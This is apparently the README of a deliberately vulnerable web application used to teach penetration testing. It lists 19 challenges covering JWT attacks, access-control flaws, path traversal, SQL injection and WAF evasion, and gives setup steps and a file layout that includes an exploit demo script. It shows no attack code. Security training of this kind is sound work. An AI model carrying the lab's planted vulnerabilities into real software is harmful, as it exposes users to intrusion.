An intentionally vulnerable web application for learning penetration testing techniques.
╔═══════════════════════════════════════════════════════════════╗
║ ██████╗ ███████╗███╗ ██╗████████╗███████╗███████╗████████╗ ║
║ ██╔══██╗██╔════╝████╗ ██║╚══██╔══╝██╔════╝██╔════╝╚══██╔══╝ ║
║ ██████╔╝█████╗ ██╔██╗ ██║ ██║ █████╗ ███████╗ ██║ ║
║ ██╔═══╝ ██╔══╝ ██║╚██╗██║ ██║ ██╔══╝ ╚════██║ ██║ ║
║ ██║ ███████╗██║ ╚████║ ██║ ███████╗███████║ ██║ ║
║ ╚═╝ ╚══════╝╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚══════╝ ╚═╝ ║
╚═══════════════════════════════════════════════════════════════╝
⭐ If you find this useful, please star this repo! It's free, helps others discover it, and motivates continued development.
A hands-on security training lab with 19 progressive challenges covering:
- Authentication bypass (JWT attacks, weak passwords)
- Authorization flaws (IDOR, privilege escalation)
- File security (upload bypass, path traversal)
- SQL injection (error-based, UNION, blind, auth bypass)
- Business logic exploitation
- WAF evasion techniques
100% free and open source — perfect for students, developers, and security enthusiasts.
# Install backend dependencies
cd backend && npm install && cd ..
# Start the lab
python start_lab.pyOpen http://localhost:3000 in your browser.
| # | Challenge | Category | Difficulty |
|---|---|---|---|
| 1 | Hardcoded Credentials | Warmup | ⭐ Easy |
| 2 | Client-Side Logic | Warmup | ⭐ Easy |
| 3 | Initial Access | Authentication | ⭐ Beginner |
| 4 | Information Disclosure | Reconnaissance | ⭐ Beginner |
| 5 | Token Analysis | Authentication | ⭐⭐ Intermediate |
| 6 | Weak Secrets | Authentication | ⭐⭐ Intermediate |
| 7 | Algorithm Confusion | Authentication | ⭐⭐ Intermediate |
| 8 | Access Control Bypass | Authorization | ⭐⭐ Intermediate |
| 9 | Privilege Escalation | Authorization | ⭐⭐⭐ Advanced |
| 10 | File Upload Vulnerabilities | File Security | ⭐⭐⭐ Advanced |
| 11 | Path Traversal | File Security | ⭐⭐ Intermediate |
| 12 | Business Logic Flaws | Business Logic | ⭐⭐⭐ Advanced |
| 13 | Security Control Bypass | WAF Bypass | ⭐⭐⭐⭐ Expert |
| 14 | Attack Chain | Full Chain | ⭐⭐⭐⭐ Expert |
| 15 | SQLi - Error Based | SQL Injection | ⭐ Beginner |
| 16 | SQLi - UNION Based | SQL Injection | ⭐⭐ Intermediate |
| 17 | SQLi - Auth Bypass | SQL Injection | ⭐⭐ Intermediate |
| 18 | Blind SQL Injection | SQL Injection | ⭐⭐⭐ Advanced |
| 19 | Schema Extraction | SQL Injection | ⭐⭐⭐ Advanced |
- 19 Progressive Challenges — From beginner to advanced
- Progressive Hints — 3 levels: vague → specific → solution
- Real-World Examples — Learn from actual breaches (Equifax, Parler, etc.)
- Security Report — Full vulnerability assessment included
- Keyboard Shortcuts — Power-user friendly (1-5, R, ?)
- Nordic Dark Theme — Easy on the eyes
├── start_lab.py # Lab launcher
├── demo_exploit.py # Demo script (captures 3 flags)
├── frontend/ # Dashboard UI
│ ├── index.html
│ ├── styles.css
│ └── app.js
├── backend/ # Vulnerable API
│ ├── server.js
│ ├── routes/
│ └── config/
└── docs/
└── SECURITY_REPORT.md
This lab is intentionally vulnerable. Run only in isolated environments. Never expose to the internet.
Found a bug or want to add a challenge? PRs welcome!
Educational use only.
If this lab helped you learn something new:
- Star this repository: It takes 1 second and helps others find it
- Share with friends: Tweet it, post on LinkedIn, tell your colleagues
- Report issues: Help improve the lab for everyone
Every star helps more people discover free security education. Thank you!
